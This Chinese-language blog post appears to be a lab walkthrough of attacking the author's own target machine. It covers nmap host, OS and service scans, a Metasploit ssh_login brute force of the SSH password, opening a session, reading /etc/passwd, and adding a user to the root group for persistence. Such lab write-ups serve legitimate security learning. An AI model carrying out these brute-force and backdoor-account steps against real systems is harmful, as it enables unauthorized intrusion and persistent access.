扫描局域网存活主机
注意:以下使用的ip地址为我部署的环境网段,如果你在看本文,请灵活的进行学习以及使用。目标主机=靶机
nmap -sP 192.168.1.0/24
![](https://img.haomeiwen.com/i1554764/7209c0e9f89385f8.jpg)
扫描靶机的操作系统以及版本号
nmap -O 192.168.1.111
![](https://img.haomeiwen.com/i1554764/386397ca16248635.jpg)
扫描靶机的应用程序以及应用程序的版本号
nmap -sV 192.168.1.111
![](https://img.haomeiwen.com/i1554764/1762b3faf0cac70c.jpg)
利用msf ssh_login模块暴力破解靶机ssh密码
先打开MSF 进入ssh_login模块 show options查看提示
使用ssh_login模块
use auxiliary/scanner/ssh/ssh_login
![](https://img.haomeiwen.com/i1554764/db38517bce9f60bd.jpg)
设定靶机IP
set RHOSTS 192.168.1.111
![](https://img.haomeiwen.com/i1554764/a94a7e68589ac574.jpg)
设置账号文件/设置账号
你可以设置账号,但是只尝试这一个,建议你使用账号文件
#设置账号
set USERNAME root
![](https://img.haomeiwen.com/i1554764/f34adb7412aa06f4.jpg)
#设置账号文件
set USER_FILE 密码文件
![](https://img.haomeiwen.com/i1554764/07bdd956c98296a2.jpg)
设置密码文件/设置密码
你可以设置密码,但是只尝试这一个,建议你使用密码文件
#设置密码
set PASSWORD 123456
![](https://img.haomeiwen.com/i1554764/b02ca9f917c2c31d.jpg)
#设置密码文件
set PASS_FILE 密码文件
![](https://img.haomeiwen.com/i1554764/a380aa29dfdf7975.jpg)
运行
你既可以使用run
也可以使用exploit
![](https://img.haomeiwen.com/i1554764/18c966f4c18f50b8.jpg)
会话
查询会话方面的信息
sessions -i
![](https://img.haomeiwen.com/i1554764/112620a279f056c3.jpg)
打开会话
#打开id为1的会话 输入ifconfig查询ip 成功
sessions -i 1
![](https://img.haomeiwen.com/i1554764/2b0d601efabac58c.jpg)
查看密码文件
cat /etc/passwd
![](https://img.haomeiwen.com/i1554764/a8b724d199ad8e46.jpg)
添加用户设置密码并添加到root组
useradd admin123
passwd admin123
usermod -g root admin123
![](https://img.haomeiwen.com/i1554764/8486e8a2ef56391a.jpg)
网友评论